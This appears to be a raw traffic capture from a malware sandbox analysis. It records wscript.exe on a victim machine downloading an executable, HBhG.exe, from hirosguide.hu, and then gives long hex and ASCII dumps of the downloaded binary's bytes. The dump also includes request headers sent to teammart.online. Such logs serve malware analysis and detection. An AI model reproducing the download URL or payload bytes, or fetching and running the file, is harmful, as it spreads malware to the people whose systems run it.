                                                    Connection: close
                                                    Content-Length: 1452
                                                    Cache-Control: no-cache
                                                    Origin: http://www.teammart.online
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                    Content-Type: application/x-www-form-urlencoded
                                                    Accept: */*
                                                    Referer: http://www.teammart.online/crhz/
                                                    Accept-Language: en-US
                                                    Accept-Encoding: gzip, deflate
                                                    Jan 30, 2023 13:40:44.859843016 CET | 786 | IN | HTTP/1.1 404 Not Found
                                                    Date: Mon, 30 Jan 2023 12:40:44 GMT
                                                    Server: Apache
                                                    Content-Length: 5278
                                                    Connection: close
                                                    Content-Type: text/html


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                    0 | 192.168.2.6 | 49714 | 91.227.138.48 | 443 | C:\Windows\System32\wscript.exe
                                                    Timestamp | kBytes transferred | Direction | Data
                                                    2023-01-30 12:39:22 UTC | 0 | OUT | GET /ti/HBhG.exe HTTP/1.1
                                                    Accept: */*
                                                    Accept-Language: en-us
                                                    UA-CPU: AMD64
                                                    Accept-Encoding: gzip, deflate
                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                    Host: hirosguide.hu
                                                    Connection: Keep-Alive
                                                    2023-01-30 12:39:22 UTC | 0 | IN | HTTP/1.1 200 OK
                                                    Date: Mon, 30 Jan 2023 12:39:22 GMT
                                                    Server: Apache
                                                    Last-Modified: Sun, 29 Jan 2023 23:42:33 GMT
                                                    ETag: "1f88309-96600-5f36fa71671d0"
                                                    Accept-Ranges: bytes
                                                    Content-Length: 615936
                                                    Connection: close
                                                    Content-Type: application/x-msdownload
                                                    Data Ascii: 8n=lppB9G+9vgid}|5?}[b3D!GjRj77r@}#} N`PW+D[@Dc>~5Yi2`9 50D ~_llYopElr[Mml#otp>W#xOBB<S3XaQA
                                                    2023-01-30 12:39:22 UTC141INData Raw: c8 3d 86 fc ea c4 54 b0 51 1c a0 63 8e 8d 19 c0 37 e6 28 dc 49 7a d5 f2 2a e7 0a a4 b9 7e cd 0c f5 63 d0 17 c7 b3 0b 1d bf e7 10 b6 58 88 f6 90 53 6d a7 63 e9 d1 fe 2e 4d 4d a8 60 e2 39 2c 6f 79 8e db 26 13 d4 cd f5 82 22 47 d5 7a 9c 29 93 30 42 0b d7 7e a4 79 6c 3f a2 92 c8 3b f4 6e a7 2a 3a e9 95 ac f9 be fc 96 81 67 7c d6 7b 75 93 af 9f 30 76 e8 e8 54 29 d6 97 9c a8 4b 0e 4c 08 9d b8 44 72 cc fd 82 1d e9 f4 77 95 3f 3c 2e e8 ec 57 78 4e ae d0 75 fb 4f 68 38 04 16 bb df 7e 1c 62 77 c5 1a 55 c5 5f 28 13 73 70 50 6c 88 a7 ee b4 8e 4a 2e 63 63 14 7f 88 bf 2d dd 7a de 84 1d 15 f6 b5 7a 09 0e 7b 21 ef 6e f0 d3 67 2e d6 31 1a c7 60 f4 cb 08 e0 21 58 0d b8 db de 81 0c 1b 34 09 d3 0f c0 2a f1 65 ee c4 8b 1c d5 a3 3b 08 5f c7 5d f1 c1 25 11 09 9d 0e 3d d9 a3 9b
                                                    Data Ascii: =TQc7(Iz*~cXSmc.MM`9,oy&"Gz)0B~yl?;n*:g|{u0vT)KLDrw?<.WxNuOh8~bwU_(spPlJ.cc-zz{!ng.1`!X4*e;_]%=
                                                    2023-01-30 12:39:22 UTC148INData Raw: fa 68 37 7c 8f 22 9f 92 02 ae c5 c1 4f 76 d0 2a 35 f2 a1 51 f1 54 49 50 c7 78 80 e6 79 6f d4 c0 77 cf 76 0d f3 bc d6 07 a9 7c 9f ad 7d cb 01 54 47 a6 66 fa 9c 3d ef a2 cf 25 4f 1d 7e 89 b7 84 71 7a 6e e5 91 78 fe 74 18 ed 5f 1e 89 b6 d7 fa 41 b9 77 16 eb 58 4a 26 f5 f7 a2 fe b9 76 23 8b 69 cd ef ea 46 41 0c 9a 15 cb 67 aa fb 97 98 fd cc ab b7 ec 15 cc 14 ba d6 9e 3a 1a 9b 9d c8 56 9b b6 74 c3 d9 7f 55 cc 38 08 63 d0 4a 44 3b 9a 51 d7 88 44 6a 55 36 70 e0 db 5b 0a 61 dd 93 59 e2 dd 8b cf d1 0b e8 2a 5e c3 e6 19 58 e9 80 7c 81 71 8d b1 89 d1 ec e9 f2 cf 8f 95 86 f4 d3 2d 45 8a ee 29 a9 6b 18 e6 f7 94 fa ab 2a 3a 88 ef d6 2e 74 39 c8 d4 22 12 c3 f5 ef a3 63 8e b8 05 02 9f 42 7f eb 54 91 d0 4d 1b b8 e1 33 62 f2 fc fd 1e 71 5b 01 a9 d6 40 18 72 c8 49 18 6e ae
                                                    Data Ascii: h7|"Ov*5QTIPxyowv|}TGf=%O~qznxt_AwXJ&v#iFAg:VtU8cJD;QDjU6p[aY*^X|q-E)k*:.t9"cBTM3bq[@rIn
                                                    2023-01-30 12:39:22 UTC156INData Raw: 40 ed 82 f8 17 dc 32 63 d7 0f ce bb 83 d4 2e d1 91 cf 7e 65 6b e6 f1 86 de aa ce 43 73 90 38 bb 79 96 9f 2b 53 fb 4c 8b df 28 27 62 a4 49 3a f2 7a 97 15 73 ce 67 bf 1a 4c 6e 2e af 64 49 0f c1 79 03 ed ed f9 70 f8 72 32 ff b8 a7 e2 19 7f 6c a3 5c 67 28 60 ba 04 ca 03 d3 2d f2 87 20 7b a3 db bd b8 45 bd ef 2c d9 a4 55 cc c7 53 32 d3 e8 b4 eb 91 f3 3a a8 c0 5c d6 86 19 40 29 90 a0 f9 16 62 22 76 86 33 8d 19 54 11 cb 18 68 77 dd 2d 67 db 96 cd 77 27 68 87 87 ee 64 8b 3c fb 56 af bd bc 63 31 38 3f fd 5c 85 4f 8c 3a 9f 39 b1 b2 85 86 0c 66 b3 94 48 0a 08 92 fa 75 a7 49 60 6f 48 f5 5f 6f a8 09 d6 1a 0c 9f a1 f3 12 b2 60 bc 8c 32 f8 91 e9 01 7d 0b 94 88 9a 5e c2 55 27 e0 f0 7e 55 a2 2e 1b 9e 44 e9 00 96 ce 3b f0 4d 17 eb 3b a0 23 fb ed 76 8a 99 37 33 c7 0e 3b 77
                                                    Data Ascii: @2c.~ekCs8y+SL('bI:zsgLn.dIypr2l\g(`- {E,US2:\@)b"v3Thw-gw'hd<Vc18?\O:9fHuI`oH_o`2}^U'~U.D;M;#v73;w
                                                    2023-01-30 12:39:22 UTC164INData Raw: b2 67 be ad fd a9 37 72 ce c1 10 c1 f4 20 00 7a 7d 90 65 e5 c1 7e 9f 42 19 85 e5 33 0f 37 b6 99 e1 b5 be 69 7d 59 57 65 41 2f db e8 bb 10 5e 2a 0c cc ad 22 d5 57 2d b5 7e a1 b6 96 42 46 38 80 fd e1 db 94 59 e3 b9 80 0d 4c 7a 61 89 6a 11 06 36 d7 5a 00 21 41 b7 48 66 28 72 49 c0 d3 94 df 3c fe 5d 08 08 5d c6 26 56 33 88 38 31 9f 72 53 a3 aa 26 08 9a 14 be f4 80 95 16 9c ee 8b 92 d6 af 54 a8 9b 5d 82 ca b3 e1 cd bc fd ef b4 23 f9 8f 93 85 d6 d3 75 68 76 1a f2 67 b8 16 a5 d1 61 17 a9 44 4f a0 ea 06 e7 5a e0 54 de cc b3 18 83 32 84 2d 24 ba fb 37 a0 ed ca 72 d0 9a 4c 80 0f 4a d6 6b 9a 6e f7 a3 58 94 ed c0 00 97 d2 12 68 90 3d 12 fa 6c 1d 7f ee 58 89 7f 43 fe 2e cd 88 ee 11 81 bc e4 e9 6f 1d 78 cf 25 40 1a 09 e2 59 94 50 1a 3a e5 13 7b a9 68 6b b1 6e a3 c4 4a
                                                    Data Ascii: g7r z}e~B37i}YWeA/^*"W-~BF8YLzaj6Z!AHf(rI<]]&V381rS&T]#uhvgaDOZT2-$7rLJknXh=lXC.ox%@YP:{hknJ
                                                    2023-01-30 12:39:22 UTC172INData Raw: a7 d7 70 1c 2f c6 9c 9b b8 12 dc 88 b5 56 35 fe fd 27 52 66 fb aa e4 8f 3c c7 d5 bd a3 30 f0 fd 09 f8 82 e3 ad 05 58 a4 dc 0d 1a 77 6c f1 2c 17 7b d6 aa 34 58 fa 4e bf ae 30 16 73 ad 94 09 af 47 27 65 f6 71 a8 cd d9 4d d5 92 35 42 4b af 3c 71 88 b6 81 bb cf 20 ab 41 85 05 aa 34 fd 2a ff 84 c0 0c b9 aa 02 08 e0 64 fa 89 0a 1d 59 12 34 73 2b ea 64 9f bf 66 13 da 70 dd 2a 93 61 04 e0 a5 a4 48 64 c1 79 3b 41 f1 c6 2a a7 3b 6e fd c0 bc 34 b7 ba d3 dc de 20 aa d4 80 08 d2 81 85 1d 22 58 37 b0 cc ec cf 46 39 24 2e ee ae 51 b9 21 a5 db 1d b3 fa 27 53 9f 05 56 0a a6 97 75 b8 97 51 59 13 c2 99 37 81 b9 85 4d 84 4e cf 17 a7 34 09 01 c8 c8 21 5e b5 04 87 7a 83 bf 8b 3a 45 6d f1 de 6d 3e 46 59 2d 60 fa cb 7b a2 c6 a3 ea 39 34 e5 5e e1 25 58 27 59 06 69 cd 88 a6 77 56
                                                    Data Ascii: p/V5'Rf<0Xwl,{4XN0sG'eqM5BK<q A4*dY4s+dfp*aHdy;A*;n4 "X7F9$.Q!'SVuQY7MN4!^z:Emm>FY-`{94^%X'YiwV
                                                    2023-01-30 12:39:22 UTC180INData Raw: c3 e1 e3 13 a0 bd 5b 41 db dd f7 42 53 6a b6 6f 91 6a aa be d7 8b 03 18 70 9e da 2c 0e 3b 8e 7c f1 44 40 85 df 10 53 b2 ae 4f 40 a2 dd 36 78 41 9f 57 3a 94 66 18 84 67 a3 6c 0e 40 bf 46 29 99 6a 2c e9 57 fd c8 b4 ba 21 a2 18 8c 7d f2 29 b0 86 d3 c6 b1 d5 8e 1c a6 89 96 b8 9e 45 4f 6e e8 cd 69 bb 6b 57 d6 dc 35 57 9a b9 bc bf d2 af f7 14 e5 61 11 d2 de 50 66 23 18 d9 c3 b6 81 d2 7b 73 0a 67 ba ec d7 3d b3 4d 0a 11 f8 71 c8 e7 cb 35 99 be 04 d5 e2 79 a9 c5 04 9e f2 bf 4d 3c 6e b8 ba d8 c8 04 9e b0 4d 42 30 de 3f c5 2b 87 d4 ec 49 33 a3 ce f0 b6 72 38 1e 36 5e 48 03 72 8b 1b 83 e7 b5 0f 60 9f 09 ce 81 eb eb 46 a7 93 50 5e ae 5e d8 09 47 f9 d7 1e b2 19 5b a9 53 76 ce a6 8f 43 f2 25 a8 08 ea 24 40 bc 18 1e a6 85 2d 8d 47 38 d9 13 bd 10 5d 5a e5 57 c2 02 73 07
                                                    Data Ascii: [ABSjojp,;|D@SO@6xAW:fgl@F)j,W!})EOnikW5WaPf#{sg=Mq5yM<nMB0?+I3r86^Hr`FP^^G[SvC%$@-G8]ZWs
                                                    2023-01-30 12:39:22 UTC188INData Raw: 97 9f e1 da 89 92 e2 fa cf 1c e2 e9 36 ab 2b 2d ec 02 6b b9 98 a8 24 ad bb d8 ef 97 f2 86 ad 2c 3f 31 04 71 53 58 11 4f 11 70 f6 b5 98 f7 05 0f 1d b6 fa e1 f4 19 48 86 6a 42 1d f1 9b 47 76 61 5c 35 f0 dd ef 4c b1 d0 1d a8 0e c0 43 9d 6a f4 c5 af c6 69 00 57 66 25 12 c4 eb 9b e7 4c bb 11 8f 6d df d0 0a 9f c0 d9 4c 1f ed 74 34 da 84 d9 c4 a0 34 83 9e d2 62 6c 71 f2 43 19 09 7b 7a e0 52 2a 66 f4 ee f4 17 3b 8d 3c 22 0a dd c7 c2 ab cd 4e 69 c1 10 bd ec b7 64 c9 6f 56 53 c9 c6 6f 63 58 2f d2 26 4d 64 eb ad 9b 73 5f 02 23 93 2d 35 61 b7 f7 9e 18 f9 f7 a7 7d 0c f4 77 59 5c ae 74 8a 3d 0f 5b 59 69 35 05 15 e5 dc 57 d0 5a 46 15 19 8a d0 89 e1 e6 76 db 59 1b 4c f4 d0 68 d8 88 42 47 0a 43 27 2a 5d 3f af 46 29 19 d3 cc 99 e2 75 61 c1 95 5a b0 11 99 b0 3e 98 5e 6a 44
                                                    Data Ascii: 6+-k$,?1qSXOpHjBGva\5LCjiWf%LmLt44blqC{zR*f;<"NidoVSocX/&Mds_#-5a}wY\t=[Yi5WZFvYLhBGC'*]?F)uaZ>^jD
                                                    2023-01-30 12:39:22 UTC195INData Raw: e8 1a 05 bc 65 f4 c9 3e e7 37 f1 66 79 6f b5 5a f3 d7 f8 99 0a ed 29 52 eb 95 16 0a 39 3c 34 22 07 2a 7e c1 3a 23 2f 3b 16 31 2e a6 b2 f3 b4 44 f4 da a0 47 13 41 40 aa e4 bc f7 13 1f ec b7 ae 46 c0 a7 18 3e 1f 1e 91 b0 ac eb 6f 01 37 b3 f9 f2 0e a4 48 68 11 f9 3b 27 f1 8d 37 f4 61 9e 92 5b 5e f1 73 f9 ee 86 3e 2a f8 b8 28 fb 7e 88 ba 54 2d 13 b5 78 70 6b de 1d cc 85 6b 9e 02 56 b6 ee 0d ea b8 80 7a d3 b8 f7 6a de 72 2a c1 03 2b 9a bc 8f 09 1a 36 e1 4c 94 49 33 bc 7d b4 96 67 97 b6 47 20 f3 d2 48 68 bb 2a 47 b3 97 3f 06 2e e5 ac 6d 64 f6 6a df 24 a5 6d c8 9b 2e 21 9e ae 19 20 e2 31 f5 71 41 ca ef 65 e0 53 06 63 b1 93 28 83 c6 33 a8 90 2f bc 4e 73 b4 c1 d3 5e 96 35 b3 b0 42 f7 84 35 8a 49 fa ab 46 ab d9 81 c4 04 72 08 6a 4a c5 05 53 9d 88 e0 2f 40 8e 9a 1e
                                                    Data Ascii: e>7fyoZ)R9<4"*~:#/;1.DGA@F>o7Hh;'7a[^s>*(~T-xpkkVzjr*+6LI3}gG Hh*G?.mdj$m.! 1qAeSc(3/Ns^5B5IFrjJS/@
                                                    2023-01-30 12:39:22 UTC203INData Raw: e7 b6 3d 2c ac 80 ec 33 51 88 48 11 38 d2 de ca d4 d6 b2 09 fe 0c bf 75 e5 2f 20 c3 d3 10 b1 cb 30 59 14 bb 67 c0 a5 32 b6 7c fb 95 87 db bf 73 52 39 54 84 02 23 29 83 b1 5d e6 d2 02 42 b6 1d 42 b9 bc e7 28 79 5a 00 4b de 07 9b 2d 97 2f 97 07 81 2c fb c6 96 63 a6 a1 0c 6f ef cc 8b 79 ce 64 8c 47 e5 01 34 4e a6 ef a5 e0 00 c0 73 09 1b 65 56 05 a3 fc 97 df 1a d1 4c 90 4d 6e bf d8 7f 38 13 55 bf 06 52 7d 22 9c 24 c8 25 dd 02 c7 c2 af 18 68 9b 51 63 a8 fc 84 7d 83 f0 2e 51 09 e5 c4 39 1d 71 2e 28 f3 ed 65 c5 e2 52 5d 10 ac 8d 59 2d 5e 31 d4 bb bf 43 ba 98 53 14 82 3c a7 74 ba a2 8e 28 36 ac 07 f3 76 39 86 b9 61 8b 4e 66 42 23 a4 b3 02 35 12 56 de 9a e9 aa cd d9 4f 20 d7 f4 00 33 7d 2c 9d 89 fd b2 a0 0e 5a 74 74 83 03 80 5a bd 74 90 63 15 77 d0 22 57 1e e6 b0
                                                    Data Ascii: =,3QH8u/ 0Yg2|sR9T#)]BB(yZK-/,coydG4NseVLMn8UR}"$%hQc}.Q9q.(eR]Y-^1CS<t(6v9aNfB#5VO 3},ZttZtcw"W
                                                    2023-01-30 12:39:22 UTC211INData Raw: 70 1b e0 2b 0a 19 af 0f ea f9 3a 30 98 f2 27 f4 f2 ee 77 02 87 2f c1 85 e2 34 76 c1 6f fb ab 75 09 19 d9 0c d1 08 fd 60 76 4c 5d f2 61 39 70 b9 04 47 35 88 a6 1a 56 b7 d0 48 50 ca 54 e9 13 e3 43 cc 5d cb 4a 07 9c af da aa a9 e7 51 e6 2e 65 0c c5 53 7e 7e 7f 5f 7f f8 7e 54 36 02 83 c3 1f 0a 74 ce e7 c3 85 bd 9c 3e 80 6a 86 7d 45 4d 5a c9 47 02 32 24 fc 7b fb 2a f8 00 1c 2c 80 0a 52 45 3a fb 9d 96 ad 62 92 95 8c d3 69 5c 6c 69 09 0d a1 94 46 66 be cd f2 0d e4 6d e9 ae 28 5f bb 60 2c 66 7a c4 f8 38 c1 13 f3 e1 a8 02 0e 3e 5f 72 a8 df 73 b7 87 ed 56 1b eb 93 13 e9 16 27 36 cc 26 16 02 82 c9 a2 22 dc fe eb 5c d5 64 a0 23 00 68 d7 6c 27 fd 53 3a b6 c9 a4 16 e4 de 36 78 b6 4f fa 2e 96 80 41 21 de 79 c4 d7 ad f0 03 da ce 69 97 50 79 4b ff 05 04 28 a7 6e b9 f4 c5
                                                    Data Ascii: p+:0'w/4vou`vL]a9pG5VHPTC]JQ.eS~~_~T6t>j}EMZG2${*,RE:bi\liFfm(_`,fz8>_rsV'6&"\d#hl'S:6xO.A!yiPyK(n
                                                    2023-01-30 12:39:22 UTC219INData Raw: ad 6c 3d d8 59 16 dc c5 97 e5 fc c6 91 73 07 79 34 7e 32 d0 37 f4 a9 04 18 6b 57 66 6a 11 2c ac 14 cb 78 be 1e f6 68 2d fb 6d 9a a5 42 e4 4b b5 59 30 9e 35 b7 97 ba d5 d5 55 50 f6 2b ee 10 a6 d2 c5 a7 d2 b5 5b 79 1e 08 de d2 0c 6d d9 a7 7e 34 f8 2b e4 64 31 55 03 f0 a3 75 03 79 39 e9 b5 84 0f 8c 1d 36 d3 be 4e 97 4b 2a 07 4e 3c 79 c3 7b 00 dc 85 60 a2 bd 34 e2 4d c9 fe 30 22 e7 ad 81 c5 b6 3d 87 ae 3d 3b 65 7d bf 07 97 ba 92 db 20 a9 95 fa 34 3f 78 c4 8a 47 ac 9b 5b 29 03 dc d3 bd 24 78 be 48 2c 70 78 fd 8d e2 64 ff d8 59 25 49 81 9e c2 79 8e 79 1b 65 31 6c d5 72 fe d8 db 92 00 88 29 4f 66 c1 dd 8d 41 dd c8 cd a9 41 14 1a 76 0f f9 55 e3 26 77 0c 7f 30 05 f8 4f 41 dc ed 6d 82 64 8d 73 94 23 5a 7a 9d 26 fe 5a 81 f0 4c fe f9 a4 c8 32 af fd 82 cd 64 3c 6c c2
                                                    Data Ascii: l=Ysy4~27kWfj,xh-mBKY05UP+[ym~4+d1Uuy96NK*N<y{`4M0"==;e} 4?xG[)$xH,pxdY%Iyye1lr)OfAAvU&w0OAmds#Zz&ZL2d<l
                                                    2023-01-30 12:39:22 UTC227INData Raw: a1 a8 bc 4a 00 a4 7d ed a2 36 2e 76 ac 24 b8 8a 36 4a 17 8b c9 b4 6d 60 60 d2 9f 27 1c 8b 20 b1 af 58 97 25 00 68 8c 2f fe 31 41 e3 39 e9 02 7c 9d 55 96 61 9f 82 2f 65 95 5d 84 5a 59 81 49 c3 7d 27 cf f5 f6 b9 22 26 80 5a 1f 7c 04 45 a9 a6 e9 6b f8 bf ea a5 7b 56 68 db d0 34 08 64 62 d2 ab ef 4d dc c8 1a e1 33 d7 e2 be 59 41 45 c1 70 63 35 fa e4 eb 9d 06 3e 0d 26 5a 64 f1 4b 7f ad 04 85 a9 57 b2 bd 24 42 a2 81 fd d5 4b 2e 6e 92 82 64 2d 82 e1 68 d5 c7 61 ef 59 49 68 38 4d 02 45 41 7b 83 a4 51 9d 26 7d d7 3f 32 f6 da e2 19 09 0d 1a b1 0e a2 b6 7f 79 ce c4 c3 0d 29 0f d8 16 37 1c 2b b3 26 91 b4 e2 31 8f fa b4 6a 9d 57 05 71 14 eb 15 dd 83 62 70 3f 26 86 f2 6e 87 b8 47 32 b2 3f c3 6d 59 d6 24 d2 eb ee 73 34 c0 2a c1 79 be d1 8d 61 b4 66 4f 3a f6 54 e0 75 2a
                                                    Data Ascii: J}6.v$6Jm``' X%h/1A9|Ua/e]ZYI}'"&Z|Ek{Vh4dbM3YAEpc5>&ZdKW$BK.nd-haYIh8MEA{Q&}?2y)7+&1jWqbp?&nG2?mY$s4*yafO:Tu*
                                                    2023-01-30 12:39:22 UTC234INData Raw: a4 d8 80 4f 35 a6 09 e9 95 d4 96 44 75 5d 79 83 80 a3 05 3e 5f 97 0e ec 23 78 d4 c2 57 92 77 bc c5 a6 94 b9 39 88 8f e7 3c ed be 5d af c4 34 25 92 8a f7 b3 0f 8c 38 b9 d3 14 45 5e ba 7d 3a a3 49 3f a5 8d 88 ae a5 3d f1 ec 2a 08 99 c2 ed 7b 19 fe a2 13 df 37 21 57 5f 62 7f b6 b8 78 53 b8 7a 12 cb dd 03 0e 13 bb cf 64 ac 37 2a 44 7c 64 06 c7 71 e4 fb 08 ee 17 fd d5 00 81 4a 3b 60 cd 60 35 31 d5 8f 5c 5f a8 b3 14 4b 85 32 5a 92 3f 5e 9e a3 1d a6 d0 4e 61 73 70 5e 75 4a 32 c8 98 e6 cf a2 7f 0b 75 41 60 30 59 98 73 f9 da 3d 1e 3e 10 91 9c 03 17 16 83 17 20 36 c5 d1 4b 0b 9c 4a c5 2a d0 21 c0 6e 9b ec 5e 4c 87 35 1e 9e d6 3f 60 48 7e c0 e6 d5 7d e1 7a 07 b3 b0 db 4c df 53 fd 25 ff e0 c1 72 04 63 52 eb 34 a4 1b 44 90 af 8f 4d a2 09 5a 25 85 b6 bf 82 4e 34 66 af
                                                    Data Ascii: O5Du]y>_#xWw9<]4%8E^}:I?=*{7!W_bxSzd7*D|dqJ;``51\_K2Z?^Nasp^uJ2uA`0Ys=> 6KJ*!n^L5?`H~}zLS%rcR4DMZ%N4f
                                                    2023-01-30 12:39:22 UTC242INData Raw: 19 75 09 73 c7 6f 90 69 23 e3 68 1c 8a 8a f1 5e 19 d2 1a be cd 01 46 6d f8 25 39 59 b9 84 c8 83 f3 fc d6 2d 34 5b e5 d5 6a e6 43 9a 9f 1c 99 b6 ad fd 5d f4 9e 35 4c 38 05 04 d8 4c e8 a0 77 2a 4d 22 71 91 47 96 fd 3f fa d3 c4 16 27 e2 f7 55 eb ea 2e e5 1c 35 34 3e 09 b9 9e 31 a8 65 90 a8 6a d7 1e e7 ac 49 70 d1 0b 9c 78 8a 7f 7b 4b 38 ec 21 64 54 9f 0f bd 5f 4e 84 3e 10 97 ff a2 5e e6 50 11 ac 4d 22 88 f7 c3 94 6c 6c f9 d4 0c c6 a3 6a 62 d4 83 05 90 54 68 d8 49 c8 37 78 67 5e a4 ed 7f d7 c7 5f 41 29 8f d1 b6 a9 2c 95 0a 27 96 11 35 23 53 28 38 66 c7 d1 df bf 79 40 0f 13 7e c0 63 8c 99 05 07 2c 8f f7 e0 68 6e ef d4 6d 95 0e ea c5 27 5d 1c 8c 61 40 12 6f f5 7f 44 a8 4a ab c5 67 53 af 0b a2 49 7c d1 af 46 c6 cd aa b9 af a4 47 72 df 2d 92 3f 83 e7 89 6e 1d ff
                                                    Data Ascii: usoi#h^Fm%9Y-4[jC]5L8Lw*M"qG?'U.54>1ejIpx{K8!dT_N>^PM"lljbThI7xg^_A),'5#S(8fy@~c,hnm']a@oDJgSI|FGr-?n
                                                    2023-01-30 12:39:22 UTC250INData Raw: eb 82 e9 a4 c9 50 15 4a db f7 66 ee 0c 01 f1 9a 79 e4 c9 f2 22 c6 ef 48 8c 1e a3 7b 03 4b 21 eb 2a ea 97 c6 50 07 0b e9 a0 3a a3 08 49 be de d8 8c f2 14 91 1b 9d 09 32 dd 9b b8 5f da 7a 24 33 ed 3b 50 d8 f1 0d 71 ae cb a9 c9 00 bd 18 14 06 3e 2e 3d 27 1b e7 d6 b1 8a 2f d3 fe 5b a2 c6 aa 20 db 30 c2 05 49 0e 55 fe 95 47 fb 1c de ba fc 88 45 ce 65 bf e3 2c 27 ca 88 0c ff c5 6e c8 f6 ac 9a 45 b3 1c 77 60 49 e1 29 25 b9 e0 99 38 36 2f f2 cd 32 8d 97 66 63 4c 61 cb 6b fb f6 79 74 fc 54 dd 96 c7 2f e3 17 84 7a c5 9e 3e 6a dd 4d 97 50 06 21 e8 dc 0f a2 22 1c 02 f8 2e dc b3 db dc d7 ec 69 77 f4 c5 b1 84 8b c8 c6 c4 13 11 c5 84 56 1b 7a 57 c5 c8 6d b8 cc d0 45 22 98 37 5d 4b 80 b3 6e b0 23 d8 0a fa 05 b7 9e 18 07 f8 3a 9d 8d 17 89 a2 d2 b0 0c 14 99 e3 91 48 e6 f4
                                                    Data Ascii: PJfy"H{K!*P:I2_z$3;Pq>.='/[ 0IUGEe,'nEw`I)%86/2fcLakytT/z>jMP!".iwVzWmE"7]Kn#:H
                                                    2023-01-30 12:39:22 UTC258INData Raw: 99 b6 07 6d bf b7 65 b7 c4 35 4c d3 62 06 99 d6 d3 07 2a c9 ed aa 90 af e6 45 8c 57 bc d8 ed ba 3e 44 5c 1c 47 98 8f 36 13 ca 8d ce 09 49 d3 78 47 67 f0 13 06 9b 62 dc 73 d4 58 d4 19 21 8c 5a 0d 29 81 bf a1 08 6f 9a 34 7c 7c 59 14 51 1a d4 b3 5e 36 c4 bd 19 03 a9 2e 1a 6b 44 73 23 27 37 81 43 27 5c 94 f1 7d c9 ec 76 c4 b6 48 7a 09 1d 4c 7c bb 26 5f 83 2a 45 e0 ac e8 15 bf 68 a4 a1 e3 2d 73 3c 71 c1 d1 f7 b2 4d 65 66 6a cd e3 7e 8c 87 58 86 96 63 c5 ba 48 e7 25 e5 10 c5 1f 1e 08 cd 58 d6 ec 37 82 a3 1c 6d 8f 9d 81 6f c9 46 59 90 f0 c6 ea 13 19 97 7e 41 d3 e6 3b 6b 09 cb 8c 46 f6 f9 8a a3 51 be 85 b4 5f a4 e9 39 c3 f9 d5 27 7f 79 3e 33 25 a9 61 12 f6 ba a5 f7 26 00 dd a0 d7 10 71 e8 50 9e 05 68 b4 6a 1f 07 cf 51 8f 78 d0 f8 19 d8 1b 43 0f 8c c6 74 8c d9 14
                                                    Data Ascii: me5Lb*EW>D\G6IxGgbsX!Z)o4||YQ^6.kDs#'7C'\}vHzL|&_*Eh-s<qMefj~XcH%X7moFY~A;kFQ_9'y>3%a&qPhjQxCt
                                                    2023-01-30 12:39:22 UTC266INData Raw: c9 e6 ce ce d7 e2 17 7e 46 94 bb 29 a8 d6 15 a9 78 2e 61 93 18 74 b6 ed b0 66 a0 95 2d 43 5b 20 45 f0 6f e4 b9 1d 54 7d 21 1e 93 fe 78 68 69 fd 1f 5a c1 f4 37 65 43 3e 7d 73 b0 6f d8 ad 94 8f 73 ed 62 a3 0e de fd 7a ce 0e a2 bb 4c 25 52 6f 39 fa f6 ab e9 58 84 82 81 01 fa 22 4a 1b 48 bc 0e 2f c5 66 9d 0e 53 e8 db c8 bb ab 09 c8 88 cc 05 3b ac 99 2c 40 ba 69 68 35 c3 8a 71 a6 33 d9 1f 96 0f 9b b4 65 67 25 ee 97 ba e9 dc 39 18 4d e4 ac 58 10 6d ea 3f f7 8d ab 36 7e 86 52 8c db bb 89 52 bb 7c 9b 95 eb 3d da 0b a6 fe 5e d6 66 f6 02 81 fb 14 15 5b c5 a6 a7 23 64 d3 1e 59 e7 61 91 fc 8f 2f 28 6e 07 36 39 76 e4 41 e1 15 7b d5 f6 60 e8 3b e4 e5 61 50 44 f3 20 a3 b0 31 9c 87 77 db 90 a2 af 23 b9 9d 9a 14 65 11 29 5b e2 56 b6 b6 a2 78 7b f1 1f f3 df dd 72 4f d1 3b
                                                    Data Ascii: ~F)x.atf-C[ EoT}!xhiZ7eC>}sosbzL%Ro9X"JH/fS;,@ih5q3eg%9MXm?6~RR|=^f[#dYa/(n69vA{`;aPD 1w#e)[Vx{rO;
                                                    2023-01-30 12:39:22 UTC273INData Raw: 33 48 c8 50 77 de d7 54 3d ef 22 99 cf 79 d4 d0 c9 fe ad 7e eb d7 21 02 7a 74 94 46 dd 47 0e 0a 04 5a 7e cf f9 85 c9 1f 1f 59 25 14 bf 0a 8c d5 43 15 69 c4 73 ec 43 37 38 da d2 12 a0 0d e1 96 c7 92 a0 43 5e 27 33 df d5 6a db e1 aa a2 79 72 47 97 10 e7 3e 53 63 64 d7 e1 b2 d6 75 28 db 1e 20 9b 69 28 66 54 7d e1 0d c3 bd b8 67 f0 6a d1 97 59 19 84 23 0e 30 81 50 2f 5b 81 09 e4 43 82 f2 2f ab 9d ed e6 51 c9 3a 97 f2 c2 90 1a 04 18 7f ef 52 ea 5e 0e 7d 57 97 3c c0 7f de 71 54 aa 86 61 a5 dd 06 f2 f4 57 d7 ea bb 5b 63 2d f2 6d f0 2e c0 75 6a 47 cb be 59 b5 90 ac f9 bc 8c ca 81 7c 3e 8d 6a f9 1d 4f 07 78 16 02 2e f9 4f 5e 20 56 d3 ef e3 4a b3 f9 96 16 37 99 05 4b 21 58 de 7b bd cc 53 5f 48 27 58 83 34 7a 3d b8 f4 17 11 16 26 ad 65 fa 8b 66 3a 0a 17 b6 cd 6e 2c
                                                    Data Ascii: 3HPwT="y~!ztFGZ~Y%CisC78C^'3jyrG>Scdu( i(fT}gjY#0P/[C/Q:R^}W<qTaW[c-m.ujGY|>jOx.O^ VJ7K!X{S_H'X4z=&ef:n,
